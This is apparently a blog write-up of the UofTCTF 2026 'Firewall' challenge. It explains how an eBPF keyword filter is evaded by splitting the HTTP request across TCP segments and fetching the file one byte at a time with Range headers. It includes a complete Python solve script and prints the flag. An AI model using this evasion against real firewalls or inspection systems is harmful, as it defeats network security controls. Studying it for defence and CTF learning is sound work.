UofTCTF 2026 - Firewall | kudaliar's blog

Overview

This challenge presents an eBPF-based network firewall that inspects packet payloads at the kernel level. The goal is to retrieve the flag from /flag.html on an nginx server, but the firewall blocks any packets containing specific patterns.

Category	Difficulty	Flag
Web/Network	Easy	`uoftctf{f1rew4l1_Is_nOT_par7icu11rLy_R0bust_I_bl4m3_3bpf}`

Source Code Analysis

The eBPF Firewall (`firewall.c`)

The firewall is implemented as a TC (Traffic Control) eBPF program attached to both ingress and egress on eth0:

1
static const char blocked_kw[KW_LEN] = "flag";
2
static const char blocked_char = '%';

Key Filtering Logic

Filter	Purpose
Keyword Blocking (`has_blocked_kw`)	Scans TCP payload for the 4-byte string “flag”
Character Blocking (`has_blocked_char`)	Scans for `%` to prevent URL encoding tricks like `%66lag`
Fragment Blocking	Drops IP fragments to prevent fragmentation attacks

Fragment Check:

1
if (iph->frag_off & bpf_htons(IP_MF | IP_OFFSET)) {
2
    return TC_ACT_SHOT;
3
}

Bidirectional Filtering (from entrypoint.sh):

tc filter add dev eth0 ingress bpf da obj /src/firewall.o sec tc/ingress
tc filter add dev eth0 egress bpf da obj /src/firewall.o sec tc/ingress

[!IMPORTANT] The same filter is applied to both ingress AND egress traffic, meaning requests AND responses are inspected.

The Vulnerability

The critical insight is that eBPF inspects individual packets, not reassembled TCP streams. The firewall checks each packet independently:

1
flowchart LR
2
    A["Packet 1: 'GET /fl'"] --> B{Contains 'flag'?}
3
    B -->|No| C[PASS ✓]
4
    D["Packet 2: 'ag.html...'"] --> E{Contains 'flag'?}
5
    E -->|No| F[PASS ✓]

If “flag” is split across two TCP segments → neither packet contains “flag” → both pass
If the response body is sent byte-by-byte → no single packet contains “flag” → all pass

Exploitation Strategy

Bypass #1: TCP Segmentation (Request Filter)

Split the HTTP request across multiple TCP segments using socket-level control:

1
# Packet 1: "GET /fl" (no "flag" keyword)
2
s.send(b"GET /fl")
3
time.sleep(0.05)  # Force packet boundary
4

5
# Packet 2: "ag.html HTTP/1.1\r\n..."
6
s.send(payload.encode())

The kernel sends these as separate packets. Neither contains “flag”, so both pass the ingress filter.

Bypass #2: HTTP Range Headers (Response Filter)

The response <h1>Here is your free flag: uoftctf{...}</h1> would be blocked on egress. However, we can use HTTP Range requests to fetch the file one byte at a time:

1
GET /flag.html HTTP/1.1
2
Host: target
3
Range: bytes=0-0

Each response contains only a single byte, so no packet ever contains the full “flag” string.

Complete Exploit Flow

1
sequenceDiagram
2
    participant A as Attacker
3
    participant S as Server
4
    A->>S: TCP: "GET /fl"
5
    Note right of S: ✓ Passes (no "flag")
6
    A->>S: TCP: "ag.html...Range: bytes=0-0"
7
    Note right of S: ✓ Passes (no "flag")
8
    S->>A: TCP: "206 Partial Content" + 1 byte
9
    Note left of A: ✓ Passes (1 byte body)
10
    loop Repeat for each byte offset
11
        A->>S: Range request for next byte
12
        S->>A: Single byte response
13
    end

Solution Script

The solve.py implements this attack:

1
import socket
2
import time
3

4
HOST = "target.chals.uoftctf.org"
5
PORT = 80
6

7
def get_flag_byte(offset):
8
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
9
    s.connect((HOST, PORT))
10

11
    # Split "flag" across TCP segments
12
    s.send(b"GET /fl")
13
    time.sleep(0.05)
14

15
    # Request single byte via Range header
16
    payload = f"ag.html HTTP/1.1\r\nHost: {HOST}\r\nRange: bytes={offset}-{offset}\r\n\r\n"
17
    s.send(payload.encode())
18

19
    response = s.recv(4096).decode()
20
    s.close()
21

22
    # Parse the single byte from response body
23
    if "206" in response:
24
        return response.split("\r\n\r\n")[1]
25
    return None
26

27
# Reconstruct the file byte by byte
28
flag = ""
29
offset = 0
30
while True:
31
    byte = get_flag_byte(offset)
32
    if byte is None:
33
        break
34
    flag += byte
35
    offset += 1
36

37
print(flag)

The script loops through each byte offset until it receives a 416 Range Not Satisfiable (end of file).

Summary

Defense Mechanism	Bypass Technique
Keyword filter on packets	TCP segmentation splits keyword across packets
`%` character block	Not needed when using Range headers
IP fragmentation block	Use TCP segmentation instead
Egress filtering	HTTP Range: single-byte responses

Conclusion

This challenge demonstrates a fundamental weakness in packet-level inspection: TCP streams can be segmented in ways that break pattern matching. The combination of:

🔪 TCP Segmentation to bypass request filtering
📦 HTTP Range Requests to bypass response filtering

…allowed us to retrieve the flag without ever sending or receiving a packet containing the blocked keyword.

Flag: uoftctf{f1rew4l1_Is_nOT_par7icu11rLy_R0bust_I_bl4m3_3bpf}

UofTCTF 2026 - Firewall